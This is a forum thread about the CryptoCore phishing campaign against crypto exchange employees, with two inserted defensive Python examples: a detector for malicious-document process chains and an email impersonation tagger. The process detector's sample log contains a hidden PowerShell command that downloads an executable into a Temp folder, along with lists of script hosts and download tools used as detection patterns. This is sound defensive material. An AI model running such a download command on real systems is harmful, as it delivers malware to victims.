Bitcoin Forum
Author Topic: Seemingly simple hacker tactic yet effective against exchange employees  (Read 237 times)
Yogee (OP)
June 25, 2020, 01:17:14 PM
Last edit: June 25, 2020, 02:25:44 PM by Yogee
Merited by DaveF (2), vapourminer (1)
#1

I just finished reading https://www.bleepingcomputer.com/news/security/cryptocore-hackers-made-over-200m-breaching-crypto-exchanges/ and I was really frustrated at how hackers can steal millions of dollars using easily preventable hacking tactics.

Exchanges can set up the best security system, but when employees or their executives are careless, all systems are as good as useless. A simple practice of "Do not trust, verify" would have saved them and the users all the trouble.

Here's a summary of the article:

1. CryptoCore hackers would collect an exchange executive's personal email and impersonate them.
2. Send a phishing email to employees containing a document that is password protected.
3. Opening the password protected file will execute VBS scripts that download malicious files. Hackers will use that as a backdoor to gain access to the password manager account and then steal keys to crypto wallets.

P.S.
Can anyone teach me how to resize the image? It's too big.
I read it before but forgot.

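The three-step chain in the summary (lure document, script host, download) leaves a recognisable parent/child process sequence on the endpoint, and that is the stage a SOC can still see after a password-protected attachment has slipped past mail scanning. The detector below is an added example, not code from the article or from anyone in this thread. It assumes the lure is an Office document that launches a script host when opened (the summary only says a password-protected document runs VBS), and that process-creation telemetry arrives as JSON lines with Sysmon-style ProcessId, ParentProcessId, Image, ParentImage and CommandLine fields, which is an assumption about your logging. The four events are constructed for the example, including one benign logon script so the rule has something not to fire on.

```python
"""Flag the 'lure document -> script host -> downloader' chain in process logs.

Added example, not from the article or the thread. Events are constructed
JSON lines; the Sysmon-style field names are an assumption about your telemetry.
"""
import json
import ntpath
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
DOWNLOADERS = {"powershell.exe", "certutil.exe", "bitsadmin.exe", "curl.exe"}
# A Windows path ending in an Office/RTF extension, as seen in WINWORD's command line.
DOC_RE = re.compile(r'([A-Za-z]:\\[^"]+?\.(?:doc[mx]?|xls[mx]?|ppt[mx]?|rtf))', re.I)

# Constructed sample events. The download URL uses a documentation address
# (203.0.113.0/24) and is not a real indicator.
SAMPLE_LOG = r"""
{"ProcessId": 4100, "ParentProcessId": 812, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\alice\\Downloads\\Vendor list.docm\""}
{"ProcessId": 4211, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "wscript.exe //B C:\\Users\\alice\\AppData\\Local\\Temp\\update.vbs"}
{"ProcessId": 4300, "ParentProcessId": 4211, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/u.exe','C:\\Users\\alice\\AppData\\Local\\Temp\\u.exe')\""}
{"ProcessId": 5010, "ParentProcessId": 812, "Image": "C:\\Windows\\System32\\cscript.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cscript.exe \\\\fileserver\\netlogon\\map_drives.vbs"}
"""


def base(path):
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(path).lower()


def load_events(text):
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestors(ev, by_pid, max_depth=6):
    """[ev, parent, grandparent, ...] as far as ParentProcessId links resolve in the log."""
    chain, cur = [ev], ev
    for _ in range(max_depth):
        cur = by_pid.get(cur["ParentProcessId"])
        if cur is None:
            break
        chain.append(cur)
    return chain


def lure_document(cmdline):
    """Pull the document path out of an Office process command line, if any."""
    m = DOC_RE.search(cmdline)
    return m.group(1) if m else None


def detect(events):
    """Return one finding per suspicious parent/child pair, with the lineage walked back to the lure."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    findings = []
    for ev in events:
        parent, child = base(ev["ParentImage"]), base(ev["Image"])
        if parent in OFFICE and child in SCRIPT_HOSTS:
            rule = "office-spawns-script-host"
        elif parent in SCRIPT_HOSTS and child in DOWNLOADERS:
            rule = "script-host-spawns-downloader"
        else:
            continue
        chain = ancestors(ev, by_pid)
        office = next((e for e in chain if base(e["Image"]) in OFFICE), None)
        if rule == "script-host-spawns-downloader" and office is not None:
            rule = "maldoc-download-chain"  # full lure -> script -> download sequence confirmed
        findings.append({
            "pid": ev["ProcessId"],
            "rule": rule,
            "chain": [base(e["Image"]) for e in chain],
            "document": lure_document(office["CommandLine"]) if office else None,
        })
    return findings


if __name__ == "__main__":
    for f in detect(load_events(SAMPLE_LOG)):
        print(f["pid"], f["rule"], " <- ".join(f["chain"]), f["document"])
```

An Office process should essentially never have wscript.exe, cscript.exe or mshta.exe as a child, so the first rule is low-noise on its own; walking ParentProcessId back to the document is what tells the responder which attachment to pull from the mailbox and who else received it.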
ABCbits
June 25, 2020, 02:17:39 PM
Merited by Yogee (1)
#2

Humans are always the weakest part of security. But the interesting part is that the hackers are willing to search for employees' personal email (rather than work email), where people usually don't take precautions, or open it from a personal PC which contains all their important files.

P.S. Use this BBcode to resize your image

Code:
[img width=400]https://www.bleepstatic.com/images/news/security/attacks/c/cryptocore/spear-phishing-attack.jpg[/img]

DaveF
June 25, 2020, 02:26:34 PM
#3

Spear phishing has been getting worse because people are getting cheaper and not investing in proper IT security.
If I am an employee at Yogee Exchange and I get an email from my boss ETFbitcoin, one of two things should happen:

1) There is an indication that it came from a local account.
2) An indication that it did not, and I should be careful.

Either one works, but if you do not have your corporate email server set up to do that, then you do not have even a basic IT security policy in place.

If the hackers managed to get into the mail server to actually authenticate and send as ETFbitcoin, then you are already in deep trouble.

-Dave

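Dave's two indications (the mail came from a local account, or it did not) are something the receiving mail gateway can compute from headers alone. The script below is an added example, not code from this thread or from any exchange. It borrows Dave's scenario as its assumptions: the company domain is taken to be yogee-exchange.example and "ETFbitcoin" is a hypothetical executive whose display name is worth protecting; it further assumes the gateway stamps an Authentication-Results header (RFC 8601) carrying SPF, DKIM and DMARC verdicts. The three messages are constructed for the example. The check tags external mail, flags an external address whose display name or local-part matches a known executive (the personal-mailbox impersonation the article describes), and treats mail that claims to be internal but fails authentication as spoofed.

```python
"""Tag inbound mail as internal/external and flag executive impersonation.

Added example, not from the thread. ORG_DOMAIN, EXECUTIVE_NAMES and the three
sample messages are assumptions constructed for the example.
"""
import email
from email import policy
from email.utils import parseaddr

ORG_DOMAIN = "yogee-exchange.example"   # assumption: the exchange's own mail domain
EXECUTIVE_NAMES = {"etfbitcoin"}        # assumption: normalised display names to protect


def normalize(name):
    """Lower-case and keep only letters/digits so 'ETF Bitcoin' and 'etf.bitcoin' compare equal."""
    return "".join(ch for ch in name.lower() if ch.isalnum())


def auth_results(msg):
    """Collect method=verdict pairs from every Authentication-Results header."""
    verdicts = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for clause in str(hdr).split(";")[1:]:   # element 0 is the authserv-id
            clause = clause.strip()
            if "=" in clause:
                method, rest = clause.split("=", 1)
                verdicts[method.strip().lower()] = rest.split()[0].lower()
    return verdicts


def classify(raw):
    """Return the warning tags a gateway should prepend for this message ([] means nothing to flag)."""
    msg = email.message_from_string(raw, policy=policy.default)
    display, addr = parseaddr(str(msg.get("From", "")))
    local, _, domain = addr.lower().rpartition("@")
    tags = []
    if domain != ORG_DOMAIN:
        tags.append("EXTERNAL")
        # A real outside mailbox posing as the boss passes SPF/DKIM/DMARC, so the
        # only signal left is the name: executive's name, not the executive's address.
        if normalize(display) in EXECUTIVE_NAMES or normalize(local) in EXECUTIVE_NAMES:
            tags.append("EXEC-IMPERSONATION")
    else:
        # Claims to be one of ours: require DMARC pass, or both SPF and DKIM passing.
        auth = auth_results(msg)
        aligned = auth.get("dmarc") == "pass" or (
            auth.get("spf") == "pass" and auth.get("dkim") == "pass")
        if not aligned:
            tags.append("SPOOFED-INTERNAL")
    return tags


# Constructed samples: a genuine outside mailbox posing as the CEO, a forged
# internal sender that fails authentication, and a genuine internal message.
PERSONAL_MAILBOX = """\
From: ETFbitcoin <etfbitcoin@gmail.example>
To: ops@yogee-exchange.example
Subject: Updated vendor list (password: 2020)
Authentication-Results: mx.yogee-exchange.example; spf=pass smtp.mailfrom=gmail.example; dkim=pass header.d=gmail.example; dmarc=pass header.from=gmail.example

Please open the attached file and review the vendors.
"""

FORGED_INTERNAL = """\
From: ETFbitcoin <etfbitcoin@yogee-exchange.example>
To: ops@yogee-exchange.example
Subject: Urgent wire request
Authentication-Results: mx.yogee-exchange.example; spf=fail smtp.mailfrom=yogee-exchange.example; dkim=none; dmarc=fail header.from=yogee-exchange.example

Process the attached invoice today.
"""

GENUINE_INTERNAL = """\
From: ETFbitcoin <etfbitcoin@yogee-exchange.example>
To: ops@yogee-exchange.example
Subject: Weekly sync
Authentication-Results: mx.yogee-exchange.example; spf=pass smtp.mailfrom=yogee-exchange.example; dkim=pass header.d=yogee-exchange.example; dmarc=pass header.from=yogee-exchange.example

Same time as usual.
"""

if __name__ == "__main__":
    for name, raw in [("personal mailbox", PERSONAL_MAILBOX),
                      ("forged internal", FORGED_INTERNAL),
                      ("genuine internal", GENUINE_INTERNAL)]:
        print(f"{name:17s} -> {classify(raw) or ['ok']}")
```

A gateway would write these tags into the Subject or a banner. The point worth noticing is the first case: a real external mailbox with the executive's name passes every SPF/DKIM/DMARC check, so authentication alone gives Dave's second indication ("it did not come from a local account") but not the impersonation warning; the display-name comparison is what supplies that.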
mk4
June 25, 2020, 04:16:34 PM
#4

That's why it's really, really important for companies (most especially in the finance industry) in general to guard against these kinds of exploits. And the problem is, you don't even need to go this deep to potentially get what you want. Remember the SIM-swap attacks in the past years? Stealing good amounts of bitcoin on Coinbase? Yeah, not even malware was needed. Only pure social engineering.

https://medium.com/coinmonks/the-most-expensive-lesson-of-my-life-details-of-sim-port-hack-35de11517124

Welsh
June 25, 2020, 11:29:26 PM
#5

Social engineering is by far the most used method, because normally the very weak point of a system is the person that is employed by the company and doesn't have knowledge of social engineering attempts. Usually, somewhat low qualified and low wage, whereas if they wanted to hack into the system in a sophisticated way they would likely be dealing with cyber security experts who are on a lot of money, and therefore put more effort into their work. For example, a lowly paid, and therefore lowly motivated, employee with decent access to the backend usually isn't going to be as motivated to protect against these types of attacks.
Baofeng
June 25, 2020, 11:33:42 PM
#6

Exchanges and their employees are going to be a high-value target for these scammers and cyber-criminals. That's why it is very important that these people understand how those criminals work and how it can be prevented, by educating them on good security hygiene. Attacks come from different directions, but I think one of the best practices is not to click anything in their email, especially from unknown sources with URL shorteners, or emails with attachments. This should be practised not just by mid-tier employees, but it should start from top management as well.

shield132
June 26, 2020, 09:51:24 AM
#7

The user above me showed you how to resize an image via BBcode, but I'll offer you another option (takes some time but good for all of us).

1. Upload your image and resize it on https://resizeimage.net/
2. Download the resized image and then upload it on https://tinyjpg.com/
3. Download the compressed image and put it between the tags [ img][/img]

This way images are compressed while still maintaining high quality, and as a result bitcointalk users load the website faster because of the compressed images (saves our MBs when we are using mobile data).

Not only are employees or their executives careless, but they don't have enough knowledge and don't put enough resources into developing better and higher security standards.

At the same time the problem lies in users too. People just blindly open everything; the most curious proof of it is how people share every fake news item they see on social media and can't decide whether BBC provides more relevant information than 9gag.

slaman29
June 26, 2020, 10:35:29 AM
#8

It's the oldest tactic in the phishing book and it continues to work until today. My cousin's company just lost a huge amount of money last week too and guess why? Their boss requested their HR to make a payment to a supplier invoice but he didn't realize the sender was fake. They had been spying on his email for a long time, and found out a huge supplier was supposed to bill them, so they did that, pretended to be the supplier and boom.

Yogee (OP)
July 04, 2020, 01:15:00 PM
#9

Quote from: ABCbits on June 25, 2020, 02:17:39 PM
Humans are always the weakest part of security. But the interesting part is that the hackers are willing to search for employees' personal email (rather than work email), where people usually don't take precautions, or open it from a personal PC which contains all their important files.
......
That personal email part got my attention too, and yes, it's less likely for employees to be less cautious when opening mails. Maybe they thought it's more private and more secure  Huh

Quote from: DaveF on June 25, 2020, 02:26:34 PM
Spear phishing has been getting worse because people are getting cheaper and not investing in proper IT security.
If I am an employee at Yogee Exchange and I get an email from my boss ETFbitcoin, one of two things should happen:

1) There is an indication that it came from a local account.
2) An indication that it did not, and I should be careful.

Either one works, but if you do not have your corporate email server set up to do that, then you do not have even a basic IT security policy in place.

If the hackers managed to get into the mail server to actually authenticate and send as ETFbitcoin, then you are already in deep trouble.

-Dave
It is hard to believe, and I personally doubt that crypto exchanges wouldn't invest in proper security, but that seems to be the case. For sure they have the funds, but maybe they're trying to save up for more profits in exchange for user funds  Huh

Quote from: mk4 on June 25, 2020, 04:16:34 PM
That's why it's really, really important for companies (most especially in the finance industry) in general to guard against these kinds of exploits. And the problem is, you don't even need to go this deep to potentially get what you want. Remember the SIM-swap attacks in the past years? Stealing good amounts of bitcoin on Coinbase? Yeah, not even malware was needed. Only pure social engineering.

https://medium.com/coinmonks/the-most-expensive-lesson-of-my-life-details-of-sim-port-hack-35de11517124
I agree that employees & executives need to be educated, and it doesn't take a lot to brief them every now and then. Most companies will avert these kinds of attacks if they are well informed and they apply what they were taught.

I heard of the SIM port attack before, but this is the first time I've read a personal testimony of a victim.

Quote from: Welsh on June 25, 2020, 11:29:26 PM
Social engineering is by far the most used method, because normally the very weak point of a system is the person that is employed by the company and doesn't have knowledge of social engineering attempts. Usually, somewhat low qualified and low wage, whereas if they wanted to hack into the system in a sophisticated way they would likely be dealing with cyber security experts who are on a lot of money, and therefore put more effort into their work. For example, a lowly paid, and therefore lowly motivated, employee with decent access to the backend usually isn't going to be as motivated to protect against these types of attacks.
Accessing accounts of lower-tier employees is probably where it started in all the hacking cases stated in the article. It's also true that the level of security awareness is different.

Quote from: Baofeng on June 25, 2020, 11:33:42 PM
Exchanges and their employees are going to be a high-value target for these scammers and cyber-criminals. That's why it is very important that these people understand how those criminals work and how it can be prevented, by educating them on good security hygiene. Attacks come from different directions, but I think one of the best practices is not to click anything in their email, especially from unknown sources with URL shorteners, or emails with attachments. This should be practised not just by mid-tier employees, but it should start from top management as well.
Spot on. Unfortunately, most of these guys do not verify first if the file they got is legitimate. It's unlikely they will even question their boss or superior if it really came from them, out of fear.

Quote from: shield132 on June 26, 2020, 09:51:24 AM
......
Not only are employees or their executives careless, but they don't have enough knowledge and don't put enough resources into developing better and higher security standards.

......
More savings and profit over security. Priorities  Wink

Quote from: slaman29 on June 26, 2020, 10:35:29 AM
It's the oldest tactic in the phishing book and it continues to work until today. My cousin's company just lost a huge amount of money last week too and guess why? Their boss requested their HR to make a payment to a supplier invoice but he didn't realize the sender was fake. They had been spying on his email for a long time, and found out a huge supplier was supposed to bill them, so they did that, pretended to be the supplier and boom.
If the boss himself is unable to verify if the supplier is legit, then the company is in big trouble. This is not the first time I've heard of such cases.

It's not related to the topic, but is HR the Human Resources department? If that's the case, I am curious as to why the owner would ask their HR instead of the company accountant, who is likely more knowledgeable and more cautious when it comes to releasing payments.

NotATether
July 04, 2020, 03:50:41 PM
#10

They should take corporate classes about phishing that teach them how to detect a phishing scam and what to do when someone is phishing you. I can't stress the last part enough. All companies should have policies about how to handle phishing attacks, including contacting law enforcement and sending legal notices against the phishers, and maybe against the email hosting provider they are using if it's a sketchy company address that's not being hosted by a mega email company (since they are most likely overrun with phishing email addresses).

trish22
July 04, 2020, 03:55:49 PM
#11

Very informative. Even secure sites, if targeted by hackers, will be hacked; the only difference is how long it takes for the system to be penetrated.
smyslov
July 05, 2020, 01:40:38 AM
#12

There is also such a thing as conniving with hackers, or an inside job: they will just make it complicated and execute a set-up hacking via social engineering to make it appear that an employee is not part of the game. We have seen a lot of hacked exchanges charged with inside jobs. Exchanges are one of the lifelines of cryptocurrency; if an exchange shows weakness, the market price will take a dip. Of course, it depends on the reputation of the exchange.
Quidat
July 05, 2020, 11:31:53 AM
#13

Quote from: smyslov on July 05, 2020, 01:40:38 AM
There is also such a thing as conniving with hackers, or an inside job: they will just make it complicated and execute a set-up hacking via social engineering to make it appear that an employee is not part of the game. We have seen a lot of hacked exchanges charged with inside jobs. Exchanges are one of the lifelines of cryptocurrency; if an exchange shows weakness, the market price will take a dip. Of course, it depends on the reputation of the exchange.

This is indeed true! Some of these cases are simply a cover-up of an inside job: they take the blame as a social engineering victim, but actually they are part of said hacking incident.
When it comes to the security aspect, we can't deny that humans are the weakest part of it. This social engineering kind of way is already known, but people are way too careless.
But we can't really deny that hackers are way too patient in finding the personal emails of said employees on said exchange. Don't know how they do it in the first place, just knowing that they are part of the company.